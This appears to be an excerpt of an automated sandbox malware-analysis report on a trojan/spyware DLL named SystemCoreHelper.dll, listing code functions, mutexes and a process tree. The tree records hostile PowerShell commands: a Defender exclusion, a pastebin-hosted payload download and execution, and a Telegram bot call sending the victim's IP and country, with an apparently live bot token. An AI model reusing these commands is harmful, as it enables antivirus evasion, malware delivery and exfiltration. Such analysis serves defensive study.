                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DA0A026_2_025DA0A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CC14A26_2_025CC14A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025E193026_2_025E1930
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D29C626_2_025D29C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BFF7F26_2_025BFF7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025ACE5226_2_025ACE52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A8E5026_2_025A8E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D9E4026_2_025D9E40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D261526_2_025D2615
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C6E0026_2_025C6E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C96F426_2_025C96F4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BF6E026_2_025BF6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A96A026_2_025A96A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025E2F4026_2_025E2F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BFF7F26_2_025BFF7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C6F7026_2_025C6F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DD71026_2_025DD710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A4F0526_2_025A4F05
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025AE7D926_2_025AE7D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C87D026_2_025C87D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BC7C926_2_025BC7C9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BEFF526_2_025BEFF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CEF8726_2_025CEF87
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CE7BB26_2_025CE7BB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BBFB626_2_025BBFB6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025D0C1C26_2_025D0C1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C541026_2_025C5410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C0C9026_2_025C0C90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A357026_2_025A3570
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CFD6526_2_025CFD65
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A6D6026_2_025A6D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C952026_2_025C9520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025A55F826_2_025A55F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025C05F026_2_025C05F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025CB58826_2_025CB588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BB5A126_2_025BB5A1
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0058243030_2_00582430
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0058309030_2_00583090
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0059BC8030_2_0059BC80
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0059F55030_2_0059F550
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0059C92030_2_0059C920
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_005841A030_2_005841A0
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0059C5A030_2_0059C5A0
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281369130_2_02813691
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281BA5830_2_0281BA58
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_02816B3030_2_02816B30
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281088830_2_02810888
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281247030_2_02812470
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_02812D1930_2_02812D19
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281C92030_2_0281C920
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281453030_2_02814530
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_02815E9830_2_02815E98
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_02815EA830_2_02815EA8
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_028166E830_2_028166E8
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281235A30_2_0281235A
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281188930_2_02811889
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_028164C830_2_028164C8
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281A1C830_2_0281A1C8
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281A95030_2_0281A950
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0281696030_2_02816960
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_0059DA1030_2_0059DA10
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\gdi32.dll 1287FC59877EDEABFCCCDCB48ADCC0D626A12A4F466F496551859ACD5E8E95C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 025B90C0 appears 58 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 025A83F0 appears 39 times
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232
                      Source: SystemCoreHelper.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                      Source: zbjnkzvo4cc.exe.17.drStatic PE information: Section: m@ka ZLIB complexity 1.0003175535402098
                      Source: mxtvcgq32fe.exe.19.drStatic PE information: Section: m@ka ZLIB complexity 1.0003175535402098
                      Source: SystemCoreHelper.dll, JQAlCrJUDBBaZfiZASnKxQXAXPFvBTlZdUcCeDph.csBase64 encoded string: 'U1Fpbkg0dlRhcnUyeEppZ3VidEo3elcya3h2M2VGMTU3WGxSWDB5S251L21Rb0VKdlU1dXZHLzJjck03eDY3cEJZV0p5cHNPcGxjVFNWOUpKdnFCWDhwcEVsaDhhTzFJMWZSYWY3S0tHeExqRHlmTDgwVjVpWUxBWjZZdjJ6NkhPcUlOSHZBQTZEL3Z6R3h1REsrREQyemxOOFhXaWxpRGhTV0l5TXEzcjJaSHV3SHlUWWsvZDJYZ3l1WmNNeFpHWGsySmtYTVFnbm1JWWRvZGpkalNIRG5MRFk3MCtGUGxwTW9Yd3IycjZaQjIyOEVGVElDZEdXVnBlMGNiMWRZTDAvTEZENm4yQVk1ZmUvVWJ6bEV2WDNkVG16S0RXTEc2TTdlMGtuNE9qZVBLN211eGVMdUgvUS8wWkhtVTR6TWxrQXhBaHM5b3l6NXQvamh2cWtMaEJYOFoycHdqZjNLeXQ3K3hBMXNEUW9VTkJXVFNEL2Y1eDhhOGloTFhoZVNmdGhrZkcrenNUMG92eGpNdmlsR0JKcjh6QzlsVERQTkg3cENlc0dwQ3FZUTZCRmM2VVJyWjBaSzd0bE9BL3JIRHEyYmtMNGhDcFRlcVpBb2tmTnpMS2hkbkJ1Tk9xaUIzR2pLZDdmempSSTJRTjVoWEVDL09Ybk5XelZGeFAvU2R6RWk3V0MxYm9XcGM5WW5uMlMzQTlMWVpIeHZzN0U5S0w4WXpMNHBSZ1NieEhYRGtSbDltb1R5ZnBabkRheUo2RVJZWkVyNkRFM2IrME9ENk1qOU1VVEdxT0ZaSDBBN2ZGYU8vRUQyQzc1Z2NLS1FIbXpOemkxbExnQmw2RGlzTGVUUk90MlF5dmRXWm9HQ0ZCY29DTTZadE8waVdudEVUNzdoQng3cjkvdEgza0JOUy9NZ3gwWlBqWUZobXFJdWRLYVFUWGo1ZUZPSGtoM2pveStncFZzMGNnODNCUVlUcGcwY09xcmlZaDVSS2RXTENrTktKSW1FNEp1M0c0bkNNZXE0c3RRRjJzMGQ0c1VHakZTWUU3M3NHeGF0cTk5SUsrU2RTQzFMSnUzZ2JsUG55d2RxRi8vS3FQeGlhREtuVlBsOXlvbU4xYy9lcHltbXd1Nk1tR0pFOENmU09KTXZST2hPcVREdXlYWGZyUjJQUDRwZVJTamRvTHJKOE12ekhYU3hjbnhxamhzU3dwT251N2NoMFBndk5sa2M2b3p4N0l6Skd6d3JBdVBzbnEwOTZxNXNWeGpoY3lHT2ZEZGtUTEptTVhSOEd4MnUzdnI5Wm1oc09uZTlvM0NVdktQb1hxaHpUUkVTSU5kNmJSSWw0d1JLTnBDUkpCWkR2dDhmUTRXUHczRjhnbXhVdXBiUWlMYURmTmh1VStmTEIyb1gvOHFvL0dKb01xZFZhNVc3YmN1NTJ0S0plaVpBVmxqcmxVZjNlVkEwUDREaW9PcVdGZGVWR3Fycm5IcDBnK2NGaE82dzFVcUJ3M2FvUlF5ZVRoWExJYzhKVk5mQlhGTEFBeHBzVjVjRnE1S1hTbFQ5V1dWRkxQekV2N0h1WldhQ2VmTGVxbHhtb1NPVCthRFhuNzJGazZhWDVEcTJhWXFaK0VVTW5rNFZ5eUhQQ1ZUWHdWeFN3QU52ZnBRRndNN3k2MGg4SVV1QkgwRm0wT3AxRTZPSmw5eUZ3bzZ3aUdmRHVuTncxVG93NGszVFpaamJtdVBzVnZWS0V5Uk9aSjZHaTFpVXpsbXZ0L1VOSnpUaVE3Z3FwcW8xbkhQR29kWUY0T0w4YUFGd3R0SVgySnVLVXJLZHdHSWRESU9SMXp3TGwxZGhTalVzdmpEOFpQTEI1YzRQV2YrYk5ZdkhGNXQ4bnVISEQxdS9ISkh4bFoyMFIrZW90YmZSZ0w2NERyMGhFVi9kOE9XZlpyMlc4NEExU2Z2NEg2dFptdGRiUWw0dGpHNVQ1OHNIYWhmL3lxajhZbWd5cDFZamxYSG5FOFZDMCs2ayt6bFdrODZZUlF5ZVRoWExJYzhKVk5mQlhGTEFBa1M0NzFncmVYTWc3NUZjSkdjc245SHdiNXZxdVpUSWY1akJ6SVYzaDlQbm4rZFRjejFoSnJWTEFzYzZQSkEvNEhSQnd0K3gvaWwwcjM2WnhZL253WUN6VFk1V2xTWURWeG8wRXlhaWVyZVB1L00wVHVvcFhxZmlFcnZkVU9xZDRyTGh4QklJUXRVSElVOWgvV053NmlCNm8wVkZhNnpRSzVYVitxWGJxeXZ5b1VOY0xtYUlhNzdCS0l1NXFGU0kzV24rWHhDdi9rSmVISkVMUDE5aWcxeXlnbUllanRwN1pPaVRhOUZNcnJOZkh3UGoxbFF3ZFVsSGI1NjB4ZVlHV3pTR0JJK01Jbnkvb3NVaGxybUpqR3RvTnhSNDIzb1NXdHNKbW10VkNIbElMdmtnUGxzcm1reWNUNVFSemRIYXRNbWJHZ1N0aStoaXA1V0c5VUNFV0d4UDNRV1l6L1djMU8rOVlyd3ZPUFVsRFNzNHBFaG9OVHNJdm9UYWdkdlIvdVpIdDV3M2NOR3JJQ0grWjFib1IwN2hjNi9uOTM5QnVBQVdBRkJTejRKYXl5ZitEOFliV0VxSjBneDArZjFOdkVHOHlwajVWanZvZU9renhyMzR1OHhPZFlVM09ocFdKUDZrcERiNm9XZWFDY0Y5YlJhQUNJaXhmaGIvNUNkeENrd0JLU2ZBN2VwYVp5d2dWZjAwN2JzS2ZXby9GR200VW12NXhtUnVyaWVlMUFCaDJUaUVGL0ZEcTd2eHpIcCtSeU5qa2M2N0hYNTBrbzNSZnd5NHJyVytVL2RtbVVOUWgxejFKcFRTQi90RHlKRk8vU1ZyN0tSYzRXTHFMaGRXZy9Nb3VzM2ZMNnB1T1Foc1RzSjZ5cmtuRklSTlBxZ1R3STJLb3VIamF0UVZaR2NhbzhSYmdES3lRSE9jdmhBYXg4Y1hURVpTL2d
                      Source: SystemCoreHelper.dll, fxGXYVQTdjJepCvWmrhZgFfiJXNdKaeubtHoHvLv.csBase64 encoded string: 'ZQ5ygZRV4qJ9XsgS3aRaSr8YfcKV1QXniGwl8u2ofkE8eCj09cwVbIWncwfd/45k', 'pnuYn+zi4sosT9XUATblVIadA8A4/5I18tfSRpje2mbevOt4IY/oskmB5Lrq1ewj'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDLL@60/52@5/6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DAAE0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,26_2_025DAAE0
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8012
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6656
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\1ixib5wlJump to behavior
                      Source: SystemCoreHelper.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SystemCoreHelper.dllStatic file information: TRID: Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled
                      Source: aspnet_regiis.exe, 0000001A.00000003.2023475967.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: SystemCoreHelper.dllReversingLabs: Detection: 18%
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Temp\zbjnkzvo4cc.exe "C:\Windows\Temp\zbjnkzvo4cc.exe"
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Temp\mxtvcgq32fe.exe "C:\Windows\Temp\mxtvcgq32fe.exe"
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiledJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiledJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Temp\zbjnkzvo4cc.exe "C:\Windows\Temp\zbjnkzvo4cc.exe"Jump to behavior
